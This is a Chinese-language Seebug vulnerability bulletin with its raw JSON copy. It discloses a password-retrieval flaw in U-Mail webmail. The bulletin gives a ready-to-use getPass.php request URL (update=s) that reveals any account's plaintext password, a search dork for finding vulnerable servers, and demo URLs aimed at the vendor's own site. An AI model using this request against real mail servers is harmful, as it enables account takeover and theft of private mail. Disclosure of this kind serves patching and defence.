Search...

U-Mail邮件系统获取指定账户权限（任意用户明文密码查询）

2014-05-22T00:00:00

ID SSV:95426
Type seebug
Reporter Root
Modified 2014-05-22T00:00:00

Description

简要描述：

可获取该系统指定用户权限，最近看发这套的人挺多的，不知道我这个你们觉得鸡肋不

详细说明：

u-mail取回密码处设计不当，导致任意用户密码可越权查看，当update=s时，可查看任意账户密码

http://mail.xxx.com/webmail/getPass.php?email=Services@xxx.com&update=s

直接查看指定邮箱账户密码

接下来想做什么都可以了。谷歌: Powered by U-Mail 邮件服务器

官网Demo： http://mail.comingchina.com/webmail/getPass1.php?email=umailtry@comingchina.com&update=s http://mail.comingchina.com/webmail/getPass2.php?email=umailtry@comingchina.com&update=s

漏洞证明：

JSON Vulners Source

Initial Source

{"_object_type": "robots.models.seebug.SeebugBulletin", "title": "U-Mail\u90ae\u4ef6\u7cfb\u7edf\u83b7\u53d6\u6307\u5b9a\u8d26\u6237\u6743\u9650\uff08\u4efb\u610f\u7528\u6237\u660e\u6587\u5bc6\u7801\u67e5\u8be2\uff09", "bulletinFamily": "exploit", "published": "2014-05-22T00:00:00", "lastseen": "2017-11-19T17:24:37", "history": [], "modified": "2014-05-22T00:00:00", "reporter": "Root", "viewCount": 2, "sourceHref": "", "status": "details", "href": "https://www.seebug.org/vuldb/ssvid-95426", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u53ef\u83b7\u53d6\u8be5\u7cfb\u7edf\u6307\u5b9a\u7528\u6237\u6743\u9650\uff0c\u6700\u8fd1\u770b\u53d1\u8fd9\u5957\u7684\u4eba\u633a\u591a\u7684\uff0c\u4e0d\u77e5\u9053\u6211\u8fd9\u4e2a\u4f60\u4eec\u89c9\u5f97\u9e21\u808b\u4e0d\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\nu-mail\u53d6\u56de\u5bc6\u7801\u5904\u8bbe\u8ba1\u4e0d\u5f53\uff0c\u5bfc\u81f4\u4efb\u610f\u7528\u6237\u5bc6\u7801\u53ef\u8d8a\u6743\u67e5\u770b\uff0c\u5f53update=s\u65f6\uff0c\u53ef\u67e5\u770b\u4efb\u610f\u8d26\u6237\u5bc6\u7801\n\n\n```\nhttp://mail.xxx.com/webmail/getPass.php?email=Services@xxx.com&update=s\n```\n\n\n\u76f4\u63a5\u67e5\u770b\u6307\u5b9a\u90ae\u7bb1\u8d26\u6237\u5bc6\u7801\n\n\n[<img src=\"https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png\" alt=\"QQ20140522-1.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png)\n\n\n\u63a5\u4e0b\u6765\u60f3\u505a\u4ec0\u4e48\u90fd\u53ef\u4ee5\u4e86\u3002\n\u8c37\u6b4c: Powered by U-Mail \u90ae\u4ef6\u670d\u52a1\u5668\n\n\n[<img src=\"https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png\" alt=\"QQ20140522-2.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png)\n\n\n\u5b98\u7f51Demo\uff1a\nhttp://mail.comingchina.com/webmail/getPass1.php?email=umailtry@comingchina.com&update=s\nhttp://mail.comingchina.com/webmail/getPass2.php?email=umailtry@comingchina.com&update=s \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png\" alt=\"QQ20140522-1.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png\" alt=\"QQ20140522-2.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png)", "type": "seebug", "enchantments_done": [], "references": [], "objectVersion": "1.4", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "dependencies": {"references": [], "modified": "2017-11-19T17:24:37"}, "vulnersScore": 5.0}, "sourceData": "", "cvss": {"vector": "NONE", "score": 0.0}, "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "cvelist": [], "id": "SSV:95426"}